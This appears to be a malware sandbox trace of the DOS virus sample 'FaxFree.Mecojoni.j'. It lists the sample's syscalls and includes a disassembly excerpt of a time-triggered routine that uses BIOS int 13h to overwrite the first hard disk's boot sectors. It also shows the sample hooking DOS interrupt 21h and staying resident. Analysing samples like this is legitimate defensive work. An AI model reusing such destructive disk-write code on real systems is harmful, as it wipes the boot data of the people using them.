Sample viewer

vx.netlux.org/Virus.DOS.FaxFree.Mecojoni.j

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:39:37.809536548Z 74 PC: 12d1f | Reallocate memory
2018-12-17T22:39:37.811560958Z 72 PC: 12d26 | Allocate memory
2018-12-17T22:39:37.813658998Z 44 PC: 13465 | Get time 0x13465: mov byte ptr cs:[0x55], cl
0x1346a: cmp cl, 0xb
0x1346d: jne 0x134a2
0x1346f: mov dl, 0x80
0x13471: mov dh, 0
0x13473: mov ch, 0
0x13475: mov cl, 1
0x13477: mov al, 9
0x13479: mov ah, 3
0x1347b: int 0x13
0x1347d: mov dl, 0x80
0x1347f: mov dh, 1
0x13481: mov ch, 0
0x13483: mov cl, 1
0x13485: mov al, 9
0x13487: mov ah, 3
0x13489: int 0x13
0x1348b: mov dx, 0x353
0x1348e: mov ah, 9
0x13490: int 0x21
2018-12-17T22:39:37.81604268Z 72 PC: 13266 | Allocate memory
2018-12-17T22:39:37.81819505Z 75 PC: 132a1 | Execute program
2018-12-17T22:39:37.834393926Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-17T22:39:37.837560493Z 53 PC: 132b5 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:39:37.839034553Z 37 PC: 132cc | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:39:37.842191393Z 77 PC: 132d0 | Get program return code
2018-12-17T22:39:37.84369377Z 49 PC: 132d7 | Terminate and stay resident (Return code = '0' | Memory size = '96')